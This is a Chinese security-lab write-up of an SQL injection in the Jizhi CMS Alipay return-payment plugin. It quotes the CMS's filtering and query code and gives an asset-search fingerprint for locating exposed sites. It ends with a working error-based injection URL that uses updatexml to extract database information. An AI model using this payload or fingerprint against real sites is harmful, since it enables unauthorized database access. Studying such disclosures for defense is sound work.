极致CMS alipay_return_pay SQL注入漏洞

0280

漏洞描述

极致CMS支付插件中存在SQL注入漏洞,通过漏洞可以获取数据库信息。

漏洞影响

极致CMS

网络测绘

icon_hash=”1657387632″

漏洞复现

登录页面

20231031172038234-337eab57-cb74-4f49-b49b-70c8518a84b6 (1)

查看一下进行过滤的函数

/**
	参数过滤,格式化
**/
function format_param($value=null,$int=0){
	if($value==null){ return '';}
	switch ($int){
		case 0://整数
			return (int)$value;
		case 1://字符串
			$value=htmlspecialchars(trim($value), ENT_QUOTES);
			if(version_compare(PHP_VERSION,'7.4','>=')){
				$value = addslashes($value);
			}else{
				if(!get_magic_quotes_gpc())$value = addslashes($value);
			}
			
			return $value;
		case 2://数组
			if($value=='')return '';
			array_walk_recursive($value, "array_format");
			return $value;
		case 3://浮点
			return (float)$value;
		case 4:
			if(version_compare(PHP_VERSION,'7.4','>=')){
				$value = addslashes($value);
			}else{
				if(!get_magic_quotes_gpc())$value = addslashes($value);
			}
			return trim($value);
	}
}

//过滤XSS攻击
function SafeFilter(&$arr) 
{
   $ra=Array('/([\x00-\x08,\x0b-\x0c,\x0e-\x19])/','/script/','/javascript/','/vbscript/','/expression/','/applet/'
   ,'/meta/','/xml/','/blink/','/link/','/style/','/embed/','/object/','/frame/','/layer/','/title/','/bgsound/'
   ,'/base/','/onload/','/onunload/','/onchange/','/onsubmit/','/onreset/','/onselect/','/onblur/','/onfocus/',
   '/onabort/','/onkeydown/','/onkeypress/','/onkeyup/','/onclick/','/ondblclick/','/onmousedown/','/onmousemove/'
   ,'/onmouseout/','/onmouseover/','/onmouseup/','/onunload/');
     
   if (is_array($arr))
   {
     foreach ($arr as $key => $value) 
     {
        if (!is_array($value))
        {
            if(version_compare(PHP_VERSION,'7.4','>=')){
				$value  = addslashes($value); 
			}else{
				if (!get_magic_quotes_gpc()){
					$value  = addslashes($value); 
				}
			}
          $value = preg_replace($ra,'',$value);     //删除非打印字符,粗暴式过滤xss可疑字符串
          $arr[$key]     = htmlentities(strip_tags($value)); //去除 HTML 和 PHP 标记并转换为 HTML 实体
        }
        else
        {
          SafeFilter($arr[$key]);
        }
     }
   }
}

看一下执行的SQL语句的函数

// 查询一条
    public function find($where=null,$order=null,$fields=null,$limit=1)
    {
	   if( $record = $this->findAll($where, $order, $fields, 1) ){
			return array_pop($record);
		}else{
			return FALSE;
		}
    }

跟进 findAll 函数

// 查询所有
    public function findAll($conditions=null,$order=null,$fields=null,$limit=null)
    {
		$where = '';
		if(is_array($conditions)){
			$join = array();
			foreach( $conditions as $key => $value ){
				$value =  '\''.$value.'\'';
				$join[] = "{$key} = {$value}";
			}
			$where = "WHERE ".join(" AND ",$join);
		}else{
			if(null != $conditions)$where = "WHERE ".$conditions;
		}
      if(is_array($order)){
       		$where .= ' ORDER BY ';
            $where .= implode(',', $order);
      }else{
         if($order!=null)$where .= " ORDER BY  ".$order;
      }
		
		if(!empty($limit))$where .= " LIMIT {$limit}";
		$fields = empty($fields) ? "*" : $fields;
 
		$sql = "SELECT {$fields} FROM {$this->table} {$where}";
		
        return $this->getData($sql);
 
    }

在跟进一下getData函数

//获取数据
	public function getData($sql)
	{
		if(!$result = $this->query($sql))return array();
		if(!$this->Statement->rowCount())return array();
		$rows = array();
		while($rows[] = $this->Statement->fetch(PDO::FETCH_ASSOC)){}
		$this->Statement=null;
		array_pop($rows);
		return $rows;
	}

跟进query执行函数

//执行SQL语句并检查是否错误
	public function query($sql){
		$this->filter[] = $sql;
        $this->Statement = $this->pdo->query($sql);
        if ($this->Statement) {
			return $this;
        }else{
			$msg = $this->pdo->errorInfo();
			if($msg[2]) exit('数据库错误:' . $msg[2] . end($this->filter));
		}
	}
  • 看到$msg = $this->pdo->errorInfo();语句,也就是说会把数据库报错信息打印在页面上并显示出来并退出
  • 一套分析下来没有发现对sql语句的过滤,如果得到的数据没有经过format_param过滤,会产生注入

例如:

function exploit(){
    M('member')->find(['username'=>$_GET['name']]);
}

如果直接这样GET POST REQUEST 带入数据库 会产生报错注入

例如 ./exploit/name=123′ (加一个引号会报错,如果引号没过滤)

现在只需要寻找类型是这样没过滤直接带入数据库的语句就行了

简单寻找下其实这样的地方挺多的,拿一个位置举例子

20231031172354975-9538177e-7adc-4b69-9554-49af256e3c59 (1)

这里是一个支付插件的位置,蓝色方块1增加代码模拟开通支付宝功能通过验证

可以看到这个函数只使用[htmlspecialchars]来过滤了xss,sql语句没有过滤,用刚刚的方法来注入

20231031172445852-96473734-e242-4466-bdc7-e78c1a8bae19 (1)

可以看到的确出现了sql语句和数据库错误,直接报错注入获取敏感信息

mypay/alipay_return_pay?out_trade_no=1%27 and updatexml(1,concat(0x7e,(select version()),0x7e),1)--+"

20231031172604871-36797c87-edda-41c7-b03b-65f6d4c78bf1 (1)

© 版权声明
本实验室所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 秋刀鱼实验室

使用声明 1、秋刀鱼实验室
2、使用本实验室相关内容时请严格遵守《中华人民共和国网络安全法》
3、本网站的文章部分内容可能来源于网络,仅供学习参考,如有侵权,请联系support@saury.net进行删除处理。
4、本网站的文章内容仅供学习使用,切勿进行非授权测试,文章阅读者行为与本站无关。
5、本站一切资源不代表本站立场,并不代表本站赞同其观点和对其真实性负责。
6、本站一律禁止以任何方式发布或转载任何违法的相关信息。
7、如发现文件链接失效,请联系我们第一时间更新。

THE END
CMS漏洞
喜欢就支持一下吧
点赞0 分享
相关推荐
评论 抢沙发

请登录后发表评论

    暂无评论内容

推荐阅读
Rails sprockets 任意文件读取漏洞 #CVE-2018-3760-秋刀鱼实验室
1173人已阅读
Rails sprockets 任意文件读取漏洞 #CVE-2018-3760
TOP1
PbootCMS domain SQL注入漏洞-秋刀鱼实验室
PbootCMS domain SQL注入漏洞
2023-11-21 17:03796人已阅读
TOP2
Go-fastdfs GetClientIp 未授权访问漏洞-秋刀鱼实验室
Go-fastdfs GetClientIp 未授权访问漏洞
2024-4-28 11:45560人已阅读
TOP3
HiKVISION 综合安防管理平台 report 任意文件上传漏洞-秋刀鱼实验室
HiKVISION 综合安防管理平台 report 任意文件上传漏洞
2024-3-28 15:07556人已阅读
TOP4
致远OA 帆软组件 ReportServer 目录遍历漏洞-秋刀鱼实验室
致远OA 帆软组件 ReportServer 目录遍历漏洞
2023-12-14 11:20482人已阅读
TOP5
Harbor 未授权创建管理员漏洞 #CVE-2019-16097-秋刀鱼实验室
Harbor 未授权创建管理员漏洞 #CVE-2019-16097
2024-4-4 15:03412人已阅读
TOP6
极致CMS 后台文件编辑插件 后台任意文件写入漏洞-秋刀鱼实验室
极致CMS 后台文件编辑插件 后台任意文件写入漏洞
2023-10-31 17:35283人已阅读
TOP7
信呼OA beifenAction.php 后台目录遍历漏洞-秋刀鱼实验室
信呼OA beifenAction.php 后台目录遍历漏洞
2024-3-11 15:18277人已阅读
TOP8
致远OA A8 htmlofficeservlet 任意文件上传漏洞-秋刀鱼实验室
致远OA A8 htmlofficeservlet 任意文件上传漏洞
2024-1-11 16:18232人已阅读
TOP9
久其财务报表 download.jsp 任意文件读取漏洞-秋刀鱼实验室
久其财务报表 download.jsp 任意文件读取漏洞
2024-4-10 10:30214人已阅读
TOP10